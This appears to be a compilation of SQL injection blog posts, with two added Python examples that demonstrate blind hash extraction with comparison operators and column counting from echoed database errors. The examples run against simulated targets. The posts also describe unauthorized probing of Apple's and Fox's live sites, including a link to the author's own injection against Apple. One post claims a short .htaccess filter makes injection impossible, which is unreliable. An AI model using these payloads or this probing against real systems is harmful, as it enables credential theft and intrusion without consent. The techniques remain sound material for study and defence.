sql injection
miniBB SQL Injection.
Here it goes again: miniBB is vulnerable to SQL injection. The vulnerability was found by irk4z and posted on Milw0rm. Good stuff; I like such vulns because they are simple to exploit. Pretty silly to pass table names in the request URI. But hey, it ain't uncommon. Programmers just won't learn.
MS Access SQL Injection Cheat Sheet.
You probably know my MySQL injection cheat sheet, but you may not know that Daath released his new MS Access SQL Injection Cheat Sheet. And oh boy, it is good! Mostly because MS Access SQL injection is somewhat undervalued, but also because it is almost undocumented. Still, most universities use MS Access, so I am very happy with this sheet. I know how much time goes into building cheat sheets, and I must say that Daath did an excellent job on this one. Go take a peek and see the craziness of MS Access, which you've probably already anticipated, since it is, after all, MS Access!
Prepare For More.
I talked about this before: how dangerous it is that the Internet is turning into servers that act like billions of desktops. In fact, the switch from desktop storage has already been made. You know the names of course, but there are also smaller companies that host spreadsheets and other sensitive documents as a service. It only takes one stupid SQL injection to access them all, and my bet is that they will have a few in any case. Haven't we learned anything?
The Art Of SQL Intrusion.
I have a book by Kevin Mitnick called The Art Of Intrusion. I ordered it about a year ago and steadily read the book. I only got to page 100 or so, because I got the feeling that what he tried to explain in the book was complete bullshit. No offense to Kevin, but I thought the book sucked big time. I heard different stories about him, and none of that was reflected in the book. So what was going on?
Request Tamper Prevention.
Fancy name, isn't it? I just invented it on the spot; it actually refers to the new .htaccess I use. I wrote this over the weekend and tried to make it as small as possible. How about 17 lines that can save you a lot of headaches? I've used a similar system for a long time and it really works. SQL injection, HTML and JavaScript injection are impossible this way. Sure, you can inject Swahili. But you can't launch an attack, and that is the whole point. I am no fan of intrusion detection systems alone. Most of them only generate logs and often they don't block the request.
Fox Pt.II
After yesterday's 'breaking news' of file disclosure, I went on and had a look at their whole site from a distance. A few non-malicious vectors taught me that they have cross-site scripting holes and, more importantly, SQL injection points, plus ColdFusion HTML and SQL injection. I will not disclose them here, nor to Fox. No free lunch this time; I hope they will take this very seriously and hire a proper security auditor to pentest their whole system. Let this be a wake-up call.
QuickEStore CSRF SQL Mayhem.
This exploit is small but pretty interesting, because it is actually a very beautiful CSRF example in all its simplicity. Yes, they use CF tokens, but tokens that are guessable. It is not only CSRFable but also vulnerable to SQL injection. Just imagine 100 vulnerable sites being loaded into one website and orchestrated as one big CSRF SQL-injecting symphony on behalf of your IP. Sounds strange? Beautiful. It takes two to tango ^^
YouTube Clone Script SQLi: 27.000 Sites Vulnerable.
Don't worry, it doesn't have anything to do with YouTube itself. The YouTube Clone Script is a software package that aims to clone YouTube and gives webmasters a chance to launch a YouTube-like site themselves. But it has issues with SQL injection, as t0pP8uZz & xprog show us. There is a remote SQL injection in msg.php which allows us to obtain login credentials. This again shows how dangerous it is to use software that everyone else uses: if a vulnerability is found, thousands of sites become instantly vulnerable. In this case I Googled about 27.000 sites.
2 Interesting SQL Vectors.
Johan Adriaans contacted me through email and gave me a few more SQL vectors to add to my cheat sheet. These are pretty interesting because they give an alternative way of approaching the same attacks, which could be useful to stay under the radar, or when some vectors are not possible. Alternative way of extracting hashes: normally we would use SUBSTRING() to select on hashes, but it is also possible to use normal operators to select on them.
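To make the "operators instead of SUBSTRING()" idea concrete, here is an added example that is not code from the post or from Johan's mail. It builds a throwaway news page on top of sqlite3 (the schema, the admin row and its MD5 hash are all constructed here), injects through the id parameter as a boolean-blind oracle, and extracts the hash twice: once the usual way with SUBSTR() and equality tests, once using nothing but `>=` on the whole hash string. The table and column names are assumptions for the demo; the same payloads work on MySQL, the post's target, where SUBSTR() is an alias of SUBSTRING() and hex digits order the same way under the default collation.

```python
"""Blind hash extraction with comparison operators instead of SUBSTRING().

Added example, not code from the post: the 'vulnerable' news page and its data
are constructed in memory with sqlite3 so the whole thing runs offline.
SUBSTR() is used for the classic method because both SQLite and MySQL accept it.
"""
import hashlib
import sqlite3

HEX = "0123456789abcdef"                            # alphabet of a hex digest
SECRET_HASH = hashlib.md5(b"s3cret").hexdigest()   # constructed sample row


def build_db() -> sqlite3.Connection:
    """Constructed schema: a public news table plus the users table we want."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO news VALUES (1, 'hello world');"
        "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    return conn


class Target:
    """Simulates news.php?id=...: the id is concatenated into the query and the
    article is shown only when a row comes back, i.e. a boolean-blind oracle."""

    def __init__(self, conn: sqlite3.Connection) -> None:
        self.conn = conn
        self.requests = 0   # counted so the two methods can be compared

    def page_shown(self, user_input: str) -> bool:
        self.requests += 1
        sql = "SELECT title FROM news WHERE id = " + user_input   # injection point
        return self.conn.execute(sql).fetchone() is not None


# Scalar subquery both methods inject; it evaluates to the admin's hash.
HASH = "(SELECT password FROM users WHERE username = 'admin')"


def extract_with_substring(target: Target, length: int = 32) -> str:
    """The usual way: cut out one character with SUBSTR() and test each hex
    digit for equality, so up to 16 requests per position."""
    out = ""
    for pos in range(1, length + 1):
        for c in HEX:
            if target.page_shown(f"1 AND SUBSTR({HASH}, {pos}, 1) = '{c}'"):
                out += c
                break
    return out


def extract_with_operators(target: Target, length: int = 32) -> str:
    """The alternative from the post: no SUBSTRING(), only >= on the whole
    string. Strings compare left to right, so once the prefix is known,
    hash >= prefix+c holds exactly when the next digit is >= c. That turns
    each position into a binary search over the 16 digits: 4 requests instead
    of up to 16, and the request carries no function name for a filter to
    match on."""
    out = ""
    for _ in range(length):
        lo, hi = 0, len(HEX) - 1            # candidate digits HEX[lo..hi]
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if target.page_shown(f"1 AND {HASH} >= '{out + HEX[mid]}'"):
                lo = mid                     # next digit is at least HEX[mid]
            else:
                hi = mid - 1                 # next digit is below HEX[mid]
        out += HEX[lo]
    return out


def compare_methods() -> dict:
    """Run both extractions against fresh targets and report request counts."""
    sub = Target(build_db())
    ops = Target(build_db())
    return {
        "substring": (extract_with_substring(sub), sub.requests),
        "operators": (extract_with_operators(ops), ops.requests),
    }


if __name__ == "__main__":
    for name, (digest, n) in compare_methods().items():
        print(f"{name:10s} {digest} in {n} requests")
```

The operator version always needs exactly four requests per hex digit (128 for an MD5), while the SUBSTR() version needs between one and sixteen depending on the digit, and its requests contain a function call that a naive filter might key on. The same trick works with `LIKE 'prefix%'` or `BETWEEN`, which is what "normal operators" covers.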
XSS & SQL Injection At Apple.
Mario showed a neatly crafted XSS code injection on Apple's website. After analyzing what Apple does there, they seem to make the obvious mistake of only filtering on words like <script> and such. As we know this is no barrier for the XSS die-hards, because a lot of other vectors are possible. A quick peek taught me that Apple also has SQL injection issues. Then I got bored and wrote a blog item about it; that's how things work around here.
Mario's XSS: http://preview.tinyurl.com/3dy45g
My SQL injection: http://tinyurl.com/yvv443
Some SQL Injection Research.
Next week I'm going to do some more research on SQL injection. I have a pretty complete sheet for MySQL, but I thought of more ways of information gathering. One of them is pretty slick, if I may say so myself. Usually when you do a UNION SELECT injection you need to guess how many columns there are in a table. This can take plenty of time, and often you cannot be sure you got a proper result. This next vector outputs the exact number of columns in a secondary table. It only works if the PHP script echoes back database errors, which is probably standard practice among programmers.
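The post does not spell the vector out, so what follows is an added example of one well-known way to get exactly this result, not necessarily the author's own: make the database complain about the table you want to read from, and read the column count out of its error message. The target is simulated with sqlite3 so it runs offline; the schema, table names and dialect labels are constructed for the demo. SQLite reports "sub-select returns N columns - expected 1" for a bare multi-column subquery; MySQL reports "Operand should contain N column(s)" (error 1241) for the `(SELECT * FROM t) = (1)` form, where N is the left operand's width. Both require the script to echo the error back, exactly the condition the post names.

```python
"""Exact column count of a secondary table from an echoed database error.

Added example, not the post's own vector: the target is simulated with sqlite3
so it runs offline. The dialect names and the MySQL payload shape are this
example's assumptions; the MySQL message is that of error 1241 (ER_OPERAND_COLUMNS).
"""
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed schema: the queried table has 3 columns, the one we want 5."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO news VALUES (1, 'hello', 'world');"
        "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT,"
        "                   password TEXT, email TEXT, role TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 'x', 'admin@example.invalid', 'admin');"
    )
    return conn


def vulnerable_page(conn: sqlite3.Connection, user_input: str) -> str:
    """news.php?id=...: the id is concatenated into the query and, as the post
    says many PHP scripts do, the raw database error is echoed to the visitor."""
    sql = "SELECT title, body FROM news WHERE id = " + user_input
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"Database error: {exc}"
    return "\n".join(f"{title}: {body}" for title, body in rows)


def guess_union_columns(conn: sqlite3.Connection, max_cols: int = 20):
    """The usual approach: widen UNION SELECT 1,2,... until the error goes away.
    Costs up to max_cols requests and only reveals the width of the query you
    are already in, not of the table you want to read."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if not vulnerable_page(conn, f"1 UNION SELECT {cols}").startswith("Database error"):
            return n
    return None


def count_payload(table: str, dialect: str) -> str:
    """Put SELECT * FROM <table> where a single value is expected; the database
    refuses and states how many columns the table really has."""
    if dialect == "sqlite":
        return f"1 AND (SELECT * FROM {table})"
    if dialect == "mysql":
        return f"1 AND (SELECT * FROM {table}) = (1)"
    raise ValueError(f"unknown dialect {dialect!r}")


# Both messages carry the count:
#   SQLite: "sub-select returns N columns - expected 1"
#   MySQL:  "Operand should contain N column(s)"
COUNT_RE = re.compile(r"sub-select returns (\d+) columns|Operand should contain (\d+) column")


def column_count_from_error(page: str):
    """Parse the echoed error; None when nothing usable was echoed."""
    m = COUNT_RE.search(page)
    return int(next(g for g in m.groups() if g)) if m else None


def column_count(conn: sqlite3.Connection, table: str):
    """One request against the simulated target instead of a guessing loop."""
    return column_count_from_error(vulnerable_page(conn, count_payload(table, "sqlite")))


if __name__ == "__main__":
    db = build_db()
    print("primary query width by guessing:", guess_union_columns(db))
    print("users table width from the error:", column_count(db, "users"))
```

Note the difference in what each method tells you: the UNION loop converges on the width of the query you are injecting into (2 here), which is what you need to make the UNION syntactically valid, while the error trick answers the other question, how many columns `users` has, in a single request and without guessing. When the application swallows database errors, `column_count_from_error` returns None and you are back to guessing.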